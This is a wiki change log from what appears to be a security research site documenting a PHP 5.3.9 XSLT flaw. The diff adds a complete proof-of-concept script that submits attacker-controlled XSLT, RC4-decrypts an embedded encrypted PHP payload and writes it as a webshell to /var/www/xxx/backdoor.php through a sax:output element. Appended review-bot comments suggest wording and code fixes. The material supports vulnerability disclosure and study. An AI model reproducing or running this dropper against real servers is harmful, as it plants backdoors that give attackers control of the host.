Changes for page Application_PHP5
on 2012/01/16 11:37
on 2012/01/16 11:39
Summary
Page properties (1 modified, 0 added, 0 removed)
Attachments (0 modified, 1 added, 0 removed)
Details
- Page properties
- Content
... ... @@ -14,7 +14,7 @@ 14 14 15 15 == PoC with crypto == 16 16 17 -A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php". 17 +A better script was later posted on [[OSS-Security>>http://seclists.org/oss-sec/2012/q1/157]] at RedHat request. This PHP script ([[attach:php539-xslt.php]]) will by default display a pre-filled HTML form including XML data, XSLT code and RC4-encrypted malicious PHP code. When the form is submitted, the user-controlled XML data is transformed using the user-controlled XSLT code. Then, the output of this transformation is displayed in the browser. Meanwhile, the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php". 18 18 19 19 = Executing PHP code = 20 20
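Review bot: the rewritten sentence "the malicious PHP code is decrypted using a static key ("simple_demo") and saved to "/var/www/xxx/backdoor.php"" still leaves out which component performs the write; per the attached script it is not PHP code but the XSLT engine itself, reached through XSLTProcessor::transformToXML (the script marks that call "// File creation !") and driven by the `<sax:output href="/var/www/xxx/backdoor.php" method="text">` element, with the ciphertext decoded by the EXSLT crypto function `cry:rc4_decrypt`. Suggest saying so, and adding that the write only succeeds where the web server's user has write access to the target directory, which is why the form text tells the reader to adjust the output path. Minor: "at RedHat request" should read "at Red Hat's request".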
- php539-xslt.php
- Author
... ... @@ -1,0 +1,1 @@ 1 +xwiki:XWiki.NicolasGregoire - Size
... ... @@ -1,0 +1,1 @@ 1 +2.0 KB - Content
... ... 
@@ -1,0 +1,68 @@ 1 + 2 +<?php 3 + 4 +// Get parameters 5 +$action = $_POST['action']; 6 +$xml = $_POST['xml']; 7 +$xsl = $_POST['xsl']; 8 + 9 +print "<html><body>"; 10 +if ($action == "transform") { 11 + 12 + print "<h2>Ready to transform ...</h2><br/>"; 13 + 14 + # LOAD XML FILE 15 + $xmldom = new DOMDocument(); 16 + print "XML: <pre>".htmlentities($xml)."</pre><br/>"; 17 + $xmldom->loadXML($xml); 18 + 19 + # LOAD XSLT FILE 20 + $xsldom = new DOMDocument(); 21 + print "XSL: <pre>".htmlentities($xsl)."</pre><br/>"; 22 + $xsldom->loadXML($xsl); // Content of $xXsl may be untrusted ! 23 + 24 + # START XSLT 25 + $xslproc = new XSLTProcessor(); 26 + $xslproc->importStylesheet($xsldom); 27 + 28 + # TRANSFORM & PRINT 29 + $output = $xslproc->transformToXML($xmldom); // File creation ! 30 + print "Output: <pre>".htmlentities($output)."</pre><br/>"; 31 + 32 +} else { 33 + 34 + # DISPLAY A PRE-FILLED FORM 35 + print "<h1>Hello!</h1><h2>You just have to click on submit() ...</h2>"; 36 + print "Consider modifying the output path (<i>/var/www/xxx/backdoor.php</i>) in the XSL<br/><br/>"; 37 + print "<form method='post'>"; 38 + print "XML document:<br/>"; 39 + print "<textarea name='xml' rows='3' cols='130'><foobar/></textarea><br/><br/>"; 40 + print "XSLT code:<br/>"; 41 + print "<textarea name='xsl' rows='20' cols='130'>"; 42 +print <<<XSLT 43 +<xsl:stylesheet 44 + version="1.0" 45 + xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 46 + xmlns:cry="http://exslt.org/crypto" 47 + xmlns:sax="http://icl.com/saxon" 48 + extension-element-prefixes="cry sax"> 49 + 50 + <xsl:template match="/"> 51 + <sax:output href="/var/www/xxx/backdoor.php" method="text"> 52 + <xsl:value-of select="cry:rc4_decrypt('simple_demo', '0262ee34196ae2df1ab850c1705ee0c38dc6ae42bbeecf140dea99675fb35539a4dcbeaf5c2e6a6cae679843dbf3650275a6be07464047dc17eff2661b8f065f0ae3abcd3b33e9fd3c48a36f2201ae65e093fa45b0a1b55cd408ec815a8dada050b8881b99e957704dc5f17208d105966680a26f')"/> 53 + </sax:output> 54 + <xsl:text>A 
webshell have been dropped</xsl:text> 55 + </xsl:template> 56 + 57 +</xsl:stylesheet> 58 +XSLT; 59 + print "</textarea><br/><br/>"; 60 + print "<input type='hidden' name='action' value='transform'/>"; 61 + print "<input type='submit'/></form>"; 62 + 63 +} 64 +print "</body></html>"; 65 + 66 +?> 67 + 68 +
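Review bot: `$action = $_POST['action'];`, `$xml = $_POST['xml'];` and `$xsl = $_POST['xsl'];` at the top of the script read request keys without an existence check, so the initial GET that renders the pre-filled form (no POST body) emits three "Undefined index" notices before the HTML; suggest `$action = isset($_POST['action']) ? $_POST['action'] : '';` and the same for the other two, which stays compatible with the PHP 5.3 target named in the file name. The comment `// Content of $xXsl may be untrusted !` refers to a variable that does not exist; the variable loaded there is `$xsl`. Also, the XSLT success message "A webshell have been dropped" should read "A webshell has been dropped".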